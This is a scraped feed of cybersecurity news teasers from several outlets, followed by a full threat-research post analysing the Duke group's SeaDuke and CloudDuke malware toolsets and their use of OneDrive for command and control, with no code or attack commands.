Read MoreAttackers are mapping your infrastructure before you even realize what's exposed. Sprocket ASM flips the script — giving you the same recon capabilities they use, plus change detection and actionable insights to close gaps fast. See your attack surface the way hackers do and beat them to it. [...]
Read MoreAt the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]
Read MoreAt the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]
Read MoreIf you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]
Read MoreA new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.
Read MoreThis is a guide on how to check whether someone compromised your online accounts.
Read MoreThreat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity
Read MorePSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid
Read MoreFederal court rules U.S. cybersecurity agency must re-hire over 100 former employees
Read MoreAffected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning
Read MoreNew details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.
Read MoreCrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.
Read MoreUnidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers
Read MoreThe FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]
Read MoreThe UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands
Read MoreSecurity experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape
Read MoreThe reported policy shift comes as the U.S. government signals a change in its threat assessment of Russia
Read MoreIn a TikTok video with over 3 million views, a woman in a fluffy, maximalist coat sits in the back seat of a luxury SUV, parked in the middle of a New York City street. Atop the 6-second video, a line of text reads, “our bodyguards got us matcha.” The camera zooms in on two […]
Read MoreThe hackers reportedly exploited a flaw in US cybersecurity firm Barracuda’s software to access VSSE's email server
Read MoreWhen it comes to AI software, you can build something clever, but that’s not always the same as building something that is secure. With so much software now getting written by AI, having a window into its security can be a challenge. That’s the premise of Archipelo, a San Francisco-based cybersecurity startup that is today […]
Read MoreGenea gets a court injunction after ransomware gang Termite claims to have leaked patient information
Read MoreVideo games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players. According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered … Continue reading Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe
The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.
Read MoreSocial media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing- some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged … Continue reading How Social Media Use Can Create Hidden Cybersecurity Risks
The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.
Read MoreFrom April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an … Continue reading KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem
The post KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.
Read MoreCloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating … Continue reading Looking back at CloudFest 2025: An essential event for the future of the cloud!
The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.
Read MoreKoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, … Continue reading KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.
The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.
Read MoreThe post KoDDos Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.
Read More🚀 Cutting-Edge Services KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored … Continue reading Technological innovation in the heart of Los Angeles at the CES 2025 🚀
The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.
Read MoreTo meet growing demand and accelerate our growth, we are launching a new sales team. Weare looking for talented, ambitious, and motivated B2B sales representatives and businessintroducers who share our vision of a safer and more resilient internet. Job Profile:Position: B2B Sales Representatives and Business IntroducersAs a key member of our Sales Team, you will … Continue reading Recruitment Announcement: B2B Sales Representatives and Business Introducers
The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.
Read MoreThe countdown has begun! There are only 3 days left to take advantage of our Halloween special and enjoy 10% off on all our hosting and DDoS protection services. Don’t miss this limited-time offer to secure your website with KoDDoS’s high-performance solutions at a great price! 🎃 Promo Code: HALLOWEEN2024 🎃 Use code HALLOWEEN2024 at … Continue reading ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃
The post ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃 appeared first on KoDDoS Blog.
Read MoreDistributed Denial of Service (DDoS) attacks represent one of the most formidable threats to modern businesses and organizations whose information systems are connected to the internet. These attacks aim to render a service unavailable by overwhelming the target server’s resources with a massive volume of malicious traffic from multiple sources. In the face of this … Continue reading Understanding and Preventing DDoS Attacks with KoDDoS
The post Understanding and Preventing DDoS Attacks with KoDDoS appeared first on KoDDoS Blog.
Read MoreA startling discovery by BeyondTrust researchers has unveiled a critical vulnerability in Microsoft Entra ID and Azure environments, where attackers can exploit lesser-known billing roles to escalate privileges within organizational tenants. This sophisticated attack vector leverages the ability of guest users, often invited for collaboration with limited permissions, to create and control Azure subscriptions in […]
The post Attackers Exploit Microsoft Entra Billing Roles to Escalate Privileges in Organizational Environments appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreThe Cofense Phishing Defense Center has uncovered a highly strategic phishing campaign that leverages Google Apps Script a legitimate development platform within Google’s ecosystem to host deceptive phishing pages. This attack, masquerading as an invoice email, exploits the inherent trust users place in Google’s trusted environment to trick recipients into divulging sensitive information. A Sophisticated […]
The post Threat Actors Exploit Google Apps Script to Host Phishing Sites appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreCybersecurity researchers from Trustwave’s Threat Intelligence Team have uncovered a large-scale phishing campaign orchestrated by the notorious hacker group Storm-1575, also known as “Dadsec.” Since September 2023, this group has been leveraging a Phishing-as-a-Service (PhaaS) platform called Tycoon2FA to target Microsoft 365 users, aiming to harvest credentials through meticulously crafted phishing pages. This campaign, active […]
The post Dadsec Hacker Group Uses Tycoon2FA Infrastructure to Steal Office365 Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreCisco Talos has uncovered a series of malicious threats masquerading as legitimate AI tool installers, targeting unsuspecting users and businesses across multiple industries. These threats, including the CyberLock and Lucky_Gh0$t ransomware families, along with a newly identified destructive malware dubbed “Numero,” exploit the growing popularity of AI solutions in sectors like B2B sales, technology, and […]
The post Beware: Weaponized AI Tool Installers Infect Devices with Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MorePure Crypter, a well-known malware-as-a-service (MaaS) loader, has been recognized as a crucial tool for threat actors targeting Windows-based systems in a thorough technical research carried out by eSentire’s Threat Response Unit (TRU) during 2024 and 2025. This loader, favored for deploying information stealers like Lumma and Rhadamanthys via the ClickFix initial access vector, has […]
The post Pure Crypter Uses Multiple Evasion Methods to Bypass Windows 11 24H2 Security Features appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA recent discovery by security researchers at BeyondTrust has revealed a critical, yet by-design, security gap in Microsoft Entra ID that could allow external guest users to gain powerful control over Azure environments. Contrary to common assumptions, Entra B2B guest accounts—typically used for collaboration with external partners—can leverage specific billing roles to create and transfer […]
The post Attackers Exploit Microsoft Entra Billing Roles to Escalate Privileges appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreMicrosoft has exposed the escalating sophistication of phishing attacks, particularly focusing on Adversary-in-the-Middle (AiTM) techniques that are becoming a cornerstone of modern cyber threats. As organizations increasingly adopt multifactor authentication (MFA), passwordless solutions, and robust email protections, threat actors are adapting with advanced methods to steal credentials, especially targeting enterprise cloud environments. AiTM attacks, often […]
The post Microsoft Reveals Techniques for Defending Against Evolving AiTM Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA critical vulnerability (CVE-2025-48057) has been discovered in Icinga 2, the widely used open-source monitoring platform. The flaw, affecting installations built with OpenSSL versions older than 1.1.0, could allow attackers to obtain valid certificates from the Icinga Certificate Authority (CA), potentially impersonating trusted nodes and compromising monitoring environments. Security updates have been released in versions […]
The post Critical Icinga 2 Vulnerability Allows Attackers to Obtain Valid Certificates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreHackers have been targeting Internet cafés in South Korea since the second half of 2024, exploiting specialized management software to install malicious tools for cryptocurrency mining. According to a detailed report from AhnLab SEcurity intelligence Center (ASEC), the attackers, active since 2022, are using the notorious Gh0st RAT (Remote Access Trojan) to seize control of […]
The post Hackers Use Gh0st RAT to Hijack Internet Café Systems for Crypto Mining appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA recent Windows 11 security update, KB5058405, released on May 13, 2025, has caused significant boot failures for some users running Windows 11 versions 22H2 and 23H2—especially in enterprise and virtual environments. Affected systems display a recovery error with code 0xc0000098, specifically referencing the ACPI.sys file, a crucial kernel-mode driver responsible for power management and […]
The post Windows 11 Security Update for 22H2 & 23H2 May Cause Recovery Errors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreAVCheck and related crypting services helped cybercriminals make malware difficult to detect and confirm that malware could slip through various antivirus tools undetected, officials said.
The post Top counter antivirus service disrupted in global takedown appeared first on CyberScoop.
Read MoreThe 28-year-old, who’d been employed by the Defense Intelligence Agency since 2019, specialized in insider threats and had top secret security clearance, officials said.
The post US intelligence employee arrested for alleged double-dealing of classified info appeared first on CyberScoop.
Read MoreThe lawmakers say the January purge has left the United States blind on the nature of the historic Salt Typhoon telecommunications breach.
The post Four Senate Democrats call on DHS to reinstate Cyber Safety Review Board membership appeared first on CyberScoop.
Read MoreThe defendants will increase reporting on spoofing, create a compliance team or AI and conduct regular training for staff on how to identify deceptive messages and the dangers of misinformation in U.S. elections.
The post Parties behind 2024 Biden AI robocall reach deal in lawsuit appeared first on CyberScoop.
Read MoreThe Philippines-based company Funnull operated a large cybercrime platform encompassing more than 332,000 domains, the FBI said.
The post Treasury sanctions crypto scam facilitator that allegedly stole $200M from US victims appeared first on CyberScoop.
Read MoreThe besieged security vendor maintains the latest exploited vulnerabilities in its products are entirely linked to unspecified security issues in open-source libraries. Some researchers aren’t buying it.
The post Questions mount as Ivanti tackles another round of zero-days appeared first on CyberScoop.
Read MoreGoogle Threat Intelligence Group said it developed means to counter the activity, which it linked to APT41.
The post Chinese hackers used Google Calendar to aid attacks on government entities appeared first on CyberScoop.
Read MoreSina Gholinejad pleaded guilty to two counts in a scheme that most visibly hit the city of Baltimore, causing $19 million in damages.
The post Iranian man pleads guilty in Robbinhood ransomware scheme appeared first on CyberScoop.
Read MoreThe deal reflects a growing trend in cybersecurity toward consolidation and integration.
The post ZScaler acquires Red Canary for boost in AI-driven security operations appeared first on CyberScoop.
Read MoreA Vietnam-based group has spread thousands of advertisements, fake websites and social media posts promising access to popular prompt-to-video AI generation tools, delivering infostealers and backdoors instead.
The post Mandiant flags fake AI video generators laced with malware appeared first on CyberScoop.
Read MoreMeta stopped three covert operations from Iran, China, and Romania using fake accounts to spread propaganda on social media platforms. Meta announced the disruption of three influence operations from Iran, China, and Romania using fake accounts to spread propaganda and manipulate discourse on Facebook, Instagram, and more. The social media giant pointed out that it […]
Read MoreThe U.S. sanctioned Funnull Technology and Liu Lizhi for aiding romance scams that caused major crypto losses through fraud infrastructure. The U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Philippines-based company Funnull Technology Inc. and its admin Liu Lizhi for enabling romance scams, causing $200M in U.S. victim losses. A romance scam […]
Read MoreConnectWise detected suspicious activity linked to a nation-state actor, impacting a small number of its ScreenConnect customers. ConnectWise revealed it had detected suspicious activity linked to an advanced nation-state actor. The company confirmed that the attack impacted a small number of its ScreenConnect customers. “ConnectWise recently learned of suspicious activity within our environment that we […]
Read MoreVictoria’s Secret took its website offline after a cyberattack, with experts warning of rising threats against major retailers. American lingerie, clothing, and beauty retailer Victoria’s Secret took its website offline following a cyberattack. At this time, the site shows the following message: “Valued customer, we identified and are taking steps to address a security incident. […]
Read MoreGoogle says China-linked group APT41 controlled malware via Google Calendar to target governments through a hacked site. Google warns that China-linked APT41 used TOUGHPROGRESS malware with Google Calendar as C2, targeting various government entities via a compromised website. ” In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple […]
Read MoreGreyNoise researchers warn of a new AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor. GreyNoise discovered the AyySSHush botnet has hacked over 9,000 ASUS routers, adding a persistent SSH backdoor. “Using an AI powered network traffic analysis tool we built called SIFT, GreyNoise has caught multiple anomalous network payloads with zero-effort that […]
Read MoreThe Czech government condemned China after linking cyber espionage group APT31 to a cyberattack on its critical infrastructure. The Czech government strongly condemned China after the cyber espionage group APT31 was linked to a cyberattack targeting the nation’s critical infrastructure. The Czech government condemned China after APT31 hackers infiltrated a ministry’s unclassified system in 2022 […]
Read MorePumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. Darktrace researchers discovered a new botnet called PumaBot targets Linux-based IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine cryptocurrency. PumaBot skips broad internet scans and instead pulls a list of targets from its […]
Read MoreApple blocked over $9B in fraud in 5 years, including $2B in 2024, stopping scams from deceptive apps to fake payment schemes on the App Store. In the past five years alone, Apple says it has blocked over $9 billion in fraudulent transactions, more than $2 billion of that in 2024, highlighting its ongoing efforts […]
Read MoreResearchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (“bitdefender-download[.]com”) spoofing Bitdefender’s Antivirus for Windows download page to trick visitors into downloading a remote access trojan called Venom RAT. “A malicious campaign […]
Read MoreCompanies want results fast, and low/no-code (LCNC) and Vibe Coding platforms promise just that: rapid application development with either no coding or AI-generated coding. LCNC and Large Language Model (LLM) Vendors quickly release products to get ahead in the AI race. Organizations procure these products to implement right away aiming for quick returns on investment […]
The post Smarter Defenses: How AI Improves Security for Low/No-Code and Vibe Coded Applications appeared first on IT Security Guru.
Read MoreWith Infosecurity Europe around the corner next week, planning your schedule can be tricky. But never fear! The Gurus have been busy collecting a selection of unmissable events to help you plan your days and ensure you get the most out of your visit. First up: the talks. And there are a lot to choose […]
The post IT Security Guru picks for Infosecurity Europe 2025 appeared first on IT Security Guru.
Read MoreCheck Point has announced significant advancements to its Quantum Force Security Gateways family. As a result, all Quantum Force Security Gateways for data centres and perimeters are set to receive a 15-25% performance uplift in threat prevention throughput, delivered automatically via a software update. In parallel, Check Point is rolling out a new line-up of […]
The post Check Point Launches Next-Gen Branch Office Security, Boosting Threat Prevention Speed by 4x appeared first on IT Security Guru.
Read MoreCheck Point Software has announced the launch of its next generation Quantum Smart-1 Management Appliances. These appliances deliver 2X increase in managed gateways and up to 70% higher log rate, with AI-powered security tools designed to meet the demands of hybrid enterprises. Fully integrated within the Check Point Infinity Platform, they offer faster, more intelligent […]
The post Check Point Enhances Enterprise Security with AI-Driven Threat Management appeared first on IT Security Guru.
Read MoreCheck Point Software has announced a definitive agreement to acquire Veriti Cybersecurity, the first fully automated, multi-vendor pre-emptive threat exposure and mitigation platform. The acquisition aims to respond to the uptick in AI-fuelled attacks facing organisations, as well as the increasing connectivity of IT environments. Founded in 2021, Veriti pioneered the Preemptive Exposure Management (PEM) […]
The post Check Point to Acquire Veriti to Transform Threat Exposure Management appeared first on IT Security Guru.
Read MoreIn today’s digital workplaces, more employees are building their own applications by generating code using Low Code No Code (LCNC), Artificial Intelligence (AI) and Large Language Model (LLM) tools instead of manually writing lines of code. These employees are called vibe coders. Vibe Coders prompt LCNC and AI tools using natural language prompts to generate […]
The post Finding the right balance between ‘vibe coders’ and security appeared first on IT Security Guru.
Read MoreKeeper Security, the cybersecurity provider of zero-trust and zero-knowledge Privileged Access Management (PAM) software protecting passwords, passkeys, privileged accounts, secrets and remote connections, is pleased to announce that security industry veteran Shane Barney has been appointed Chief Information Security Officer (CISO). Shane joins Keeper from the U.S. Citizenship and Immigration Services (USCIS), where he served […]
The post Keeper Security appoints new CISO appeared first on IT Security Guru.
Read MoreAPI security orgnanisation Salt Security has announced its expanded partnership and new integration with Wiz, the leader in cloud security. The integration between Salt Security and Wiz enables organisations to detect, comprehend, and respond to both API security posture gaps and critical risks directly within their cloud security infrastructure. The complexity and size of modern […]
The post Salt Security Partners With Wiz, Combines Cloud and API Security appeared first on IT Security Guru.
Read MoreThe European Union Agency for Cybersecurity (ENISA) has unveiled the European Vulnerability Database (EUVD), a strategic move designed to enhance digital security across the bloc and reduce reliance on U.S.-centric cybersecurity infrastructure. The EUVD, now live for consultation, aggregates vulnerability data from a wide range of sources, including national Computer Security Incident Response Teams (CSIRTs), […]
The post ENISA Launches European Vulnerability Database to Bolster EU Cyber Resilience appeared first on IT Security Guru.
Read MoreDescribed as revolutionary and disruptive, AI agents are the new cornerstone of innovation in 2025. But as with any technology standing on the cutting edge, this evolution isn’t without its trade-offs. Will this new blend of intelligence and autonomy really introduce a new era of efficiency? Or does the ability for AI Agents to act […]
The post AI Agents: Transformative or Turbulent? appeared first on IT Security Guru.
Read MoreCybereason issues Threat Alerts to inform customers of emerging impacting threats, critical vulnerabilities and attacker campaigns. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Read MoreCybereason GSOC has identified a malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023.
Read MoreThis article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer".
Read MoreBetween 2022 and 2024, data breach-related class actions in the United States surged by over 146%, with the top 10 settlements in 2024 averaging 15% higher than in 2023. As organizations grapple with increasingly aggressive litigation stemming from cybersecurity incidents, class action lawsuits have become a major risk vector—one that now rivals the breach itself in terms of financial, operational, and reputational impact, underscoring the importance of both proactive cybersecurity posture and a strong defensive strategy in litigation. Whether it’s demonstrating reasonable security practices or disputing claims of harm resulting from cybersecurity incidents, the involvement of technical experts has become critical.
Read MoreCybereason issues Threat Analysis reports to investigate emerging threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason investigates the new Ransomware-as-a-Service (RaaS) known as PlayBoy Locker and how to defend against it through the Cybereason Defense Platform.
Read MoreSkip ahead if you have heard this story, but when I started in anti-virus at Dr Solomon’s, Alan Solomon would share how he moved from doing hard disk data recoveries into antivirus because he received a drive to recover and recognized the corruption was logical. As such to fix the damage he wrote an algorithm (he was a mathematician by education) to undo the corruption. A few months later he was recovering another drive and recognized the same logical corruption, which led him to write a new algorithm to detect this corruption; this was how he started Dr Solomon’s antivirus software. The point here is that traditional anti-virus has always been based on pattern matching. Find something unique to each attack in its code, then you can write an algorithm or more commonly called these days a signature to detect, block and repair the attack. I remember Alan saying effectively that signatures had solved the virus problem, the volume would continue to grow, as would the complexity, but the same signature solution would always apply.
Read MoreThreat actors with financial motivations often leverage BIN attacks when targeting financial services or eCommerce victims. BIN attacks involve threat actors systematically testing card numbers stemming from a Bank Identification Number (BIN) to find valid card details. BIN values are assigned to card issuers and form the first 6-8 digits on payment cards. These values are published to merchants, payment processors, and other service providers to facilitate transactions and are publicly available. The BIN is then followed by an additional set of numbers (the account number) to form a complete Primary Account Number (PAN), or card number.
Read MoreBusiness email compromise attacks have become increasingly common in recent years, driven by sophisticated social engineering tactics that make it easier to dupe victims. This is in part to the believability that the threat actors are able to achieve by collecting sensitive information from publicly available sources, including corporate websites and social media. Criminals leverage this information to pose as trusted colleagues or business partners, using stolen or spoofed email accounts to deliver convincing messages that prompt recipients to transfer funds or disclose confidential information. The evolving nature of these schemes is characterized by their high success rate, low technological barriers to entry for threat actors, and the substantial financial losses incurred by victim organizations. Advancements in automation, AI-driven personalization, and ready-to-use phishing kits have further accelerated the proliferation of BEC attacks, creating a lucrative marketplace for cybercriminals.
Read MoreScammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.
As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.
Read MoreOur "construction project" is progressing nicely.
And it should resolve this…
Fix mobile usability issues?
Translation: your site doesn't help us sell more Android phones and ads.
But whatever, the "issues" should be fixed soon enough.
On 18/08/15 At 12:52 PM
Read MoreRegular readers will have noticed it's been slow here of late.
Under Construction
We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.
More info coming soon.
In the meantime, you can still catch us on Twitter.
On 13/08/15 At 01:25 PM
Read MoreAsk, and sometimes, you shall receive.
Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.
Apple released iOS 9 Public Beta 2:
And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.
We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.
Kudos Apple! Looking forward to seeing this in iOS 9's general release.
Big hat tip to Rosyna Keller.
On 23/07/15 At 09:53 AM
Read MoreRecent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have born a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.
Linux support added with the cross-platform SeaDuke malware
Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect, that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.
An example of the cross-platform support found in SeaDuke.
A new set of solutions with the CloudDuke malware toolset
Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:
� C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
� c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
� c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
� c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb
The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.
We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.
A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.
Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.
A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.
All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.
CloudDuke spear-phishing campaigns and similarities with CozyDuke
CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phising emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".
Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.
Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have born a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note, that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.
The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.
Increasingly using cloud services to evade detection
CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.
In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.
By relying solely on 3rd party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons. (Coincidentally, the implications of 3rd party web services being used as command and control channels is also the subject of an upcoming talk at the VirusBulletin 2015 conference).
Directing limited resources towards evading detection and staying ahead of defenders
Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code such as supporting frameworks between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefits of saving time and resources by providing two malware toolsets, that while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.
The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Duke's are not planning to stop any time soon.
Research and post by Artturi (@lehtior2)
